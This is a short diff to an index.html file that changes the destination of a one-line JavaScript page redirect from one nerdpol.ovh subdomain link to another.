--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location = "https://restitua.nerdpol.ovh/r/JpciF79";</script>
+<script type="text/javascript">window.location = "https://valids.nerdpol.ovh/r/kxKQRqS";</script>
